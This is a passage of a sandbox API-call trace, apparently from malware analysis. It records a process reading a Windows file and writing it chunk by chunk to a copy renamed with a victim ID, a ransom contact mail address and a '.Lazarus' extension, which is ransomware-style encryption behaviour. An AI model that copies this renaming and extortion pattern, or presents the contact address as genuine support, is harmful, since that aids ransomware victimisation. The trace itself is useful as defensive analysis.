lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0066.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0066.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0066.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0066.270] AreFileApisANSI () returned 1 [0066.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0066.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0066.270] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.270] GetFileType (hFile=0x420) returned 0x1 [0066.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0066.270] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.270] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.271] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.271] CloseHandle (hObject=0x420) returned 1 [0066.271] AreFileApisANSI () returned 1 [0066.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0066.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0066.271] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.271] GetFileType (hFile=0x420) returned 0x1 [0066.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.271] CloseHandle (hObject=0x420) returned 1 [0066.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0066.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.272] AreFileApisANSI () returned 1 [0066.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0066.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0066.272] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde)) returned 1 [0066.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0066.272] AreFileApisANSI () returned 1 [0066.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0066.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0066.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0066.273] GetLastError () returned 0x0 [0066.273] SetLastError (dwErrCode=0x0) [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0066.273] GetLastError () returned 0x0 [0066.273] SetLastError (dwErrCode=0x0) [0066.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x719c8 [0066.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0066.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.273] AreFileApisANSI () returned 1 [0066.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0066.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0066.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0066.274] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.274] GetFileType (hFile=0x420) returned 0x1 [0066.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0066.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0066.274] AreFileApisANSI () returned 1 [0066.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0066.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 45 [0066.274] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.274] GetFileType (hFile=0x428) returned 0x1 [0066.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0066.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0066.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.275] GetLastError () returned 0x0 [0066.275] SetLastError (dwErrCode=0x0) [0066.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.275] GetLastError () returned 0x0 [0066.275] SetLastError (dwErrCode=0x0) [0066.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0066.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0066.275] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0066.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0066.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0066.277] GetLastError () returned 0x0 [0066.277] SetLastError (dwErrCode=0x0) [0066.278] GetLastError () returned 0x0 [0066.278] SetLastError (dwErrCode=0x0) [0066.278] GetLastError () returned 0x0 [0066.278] SetLastError (dwErrCode=0x0) [0066.278] GetLastError () returned 0x0 [0066.278] SetLastError (dwErrCode=0x0) [0066.278] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.278] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.280] GetLastError () returned 0x0 [0066.280] SetLastError (dwErrCode=0x0) [0066.280] GetLastError () returned 0x0 [0066.280] SetLastError (dwErrCode=0x0) [0066.280] GetLastError () returned 0x0 [0066.280] SetLastError (dwErrCode=0x0) [0066.280] GetLastError () returned 0x0 [0066.280] SetLastError (dwErrCode=0x0) [0066.280] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.280] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.281] GetLastError () returned 0x0 [0066.281] SetLastError (dwErrCode=0x0) [0066.281] GetLastError () returned 0x0 [0066.281] SetLastError (dwErrCode=0x0) [0066.281] GetLastError () returned 0x0 [0066.281] SetLastError (dwErrCode=0x0) [0066.281] GetLastError () returned 0x0 [0066.281] SetLastError (dwErrCode=0x0) [0066.281] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.281] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.282] GetLastError () returned 0x0 [0066.282] SetLastError (dwErrCode=0x0) [0066.282] GetLastError () returned 0x0 [0066.282] SetLastError (dwErrCode=0x0) [0066.282] GetLastError () returned 0x0 [0066.282] SetLastError (dwErrCode=0x0) [0066.282] GetLastError () returned 0x0 [0066.282] SetLastError (dwErrCode=0x0) [0066.282] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.282] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.282] GetLastError () returned 0x0 [0066.282] SetLastError (dwErrCode=0x0) [0066.283] GetLastError () returned 0x0 [0066.283] SetLastError (dwErrCode=0x0) [0066.283] GetLastError () returned 0x0 [0066.283] SetLastError (dwErrCode=0x0) [0066.283] GetLastError () returned 0x0 [0066.283] SetLastError (dwErrCode=0x0) [0066.283] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.283] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.283] GetLastError () returned 0x0 [0066.283] SetLastError (dwErrCode=0x0) [0066.283] GetLastError () returned 0x0 [0066.283] SetLastError (dwErrCode=0x0) [0066.284] GetLastError () returned 0x0 [0066.284] SetLastError (dwErrCode=0x0) [0066.284] GetLastError () returned 0x0 [0066.284] SetLastError (dwErrCode=0x0) [0066.284] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.284] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.284] GetLastError () returned 0x0 [0066.284] SetLastError (dwErrCode=0x0) [0066.284] GetLastError () returned 0x0 [0066.284] SetLastError (dwErrCode=0x0) [0066.284] GetLastError () returned 0x0 [0066.284] SetLastError (dwErrCode=0x0) [0066.285] GetLastError () returned 0x0 [0066.285] SetLastError (dwErrCode=0x0) [0066.285] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.285] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.285] GetLastError () returned 0x0 [0066.285] SetLastError (dwErrCode=0x0) [0066.285] GetLastError () returned 0x0 [0066.285] SetLastError (dwErrCode=0x0) [0066.285] GetLastError () returned 0x0 [0066.285] SetLastError (dwErrCode=0x0) [0066.285] GetLastError () returned 0x0 [0066.285] SetLastError (dwErrCode=0x0) [0066.286] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.286] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.286] GetLastError () returned 0x0 [0066.286] SetLastError (dwErrCode=0x0) [0066.286] GetLastError () returned 0x0 [0066.286] SetLastError (dwErrCode=0x0) [0066.286] GetLastError () returned 0x0 [0066.286] SetLastError (dwErrCode=0x0) [0066.286] GetLastError () returned 0x0 [0066.286] SetLastError (dwErrCode=0x0) [0066.286] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.287] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.287] GetLastError () returned 0x0 [0066.287] SetLastError (dwErrCode=0x0) [0066.287] GetLastError () returned 0x0 [0066.287] SetLastError (dwErrCode=0x0) [0066.287] GetLastError () returned 0x0 [0066.287] SetLastError (dwErrCode=0x0) [0066.287] GetLastError () returned 0x0 [0066.287] SetLastError (dwErrCode=0x0) [0066.287] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.287] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.288] GetLastError () returned 0x0 [0066.288] SetLastError (dwErrCode=0x0) [0066.288] GetLastError () returned 0x0 [0066.288] SetLastError (dwErrCode=0x0) [0066.288] GetLastError () returned 0x0 [0066.288] SetLastError (dwErrCode=0x0) [0066.288] GetLastError () returned 0x0 [0066.288] SetLastError (dwErrCode=0x0) [0066.288] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.288] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.288] GetLastError () returned 0x0 [0066.289] SetLastError (dwErrCode=0x0) [0066.289] GetLastError () returned 0x0 [0066.289] SetLastError (dwErrCode=0x0) [0066.289] GetLastError () returned 0x0 [0066.289] SetLastError (dwErrCode=0x0) [0066.289] GetLastError () returned 0x0 [0066.289] SetLastError (dwErrCode=0x0) [0066.289] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.289] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.289] GetLastError () returned 0x0 [0066.289] SetLastError (dwErrCode=0x0) [0066.289] GetLastError () returned 0x0 [0066.290] SetLastError (dwErrCode=0x0) [0066.290] GetLastError () returned 0x0 [0066.290] SetLastError (dwErrCode=0x0) [0066.290] GetLastError () returned 0x0 [0066.290] SetLastError (dwErrCode=0x0) [0066.290] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.290] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.290] GetLastError () returned 0x0 [0066.290] SetLastError (dwErrCode=0x0) [0066.290] GetLastError () returned 0x0 [0066.290] SetLastError (dwErrCode=0x0) [0066.290] GetLastError () returned 0x0 [0066.291] SetLastError (dwErrCode=0x0) [0066.291] GetLastError () returned 0x0 [0066.291] SetLastError (dwErrCode=0x0) [0066.291] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.291] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.291] GetLastError () returned 0x0 [0066.291] SetLastError (dwErrCode=0x0) [0066.291] GetLastError () returned 0x0 [0066.291] SetLastError (dwErrCode=0x0) [0066.291] GetLastError () returned 0x0 [0066.291] SetLastError (dwErrCode=0x0) [0066.291] GetLastError () returned 0x0 [0066.291] SetLastError (dwErrCode=0x0) [0066.292] ReadFile (in: hFile=0x428, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.292] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: 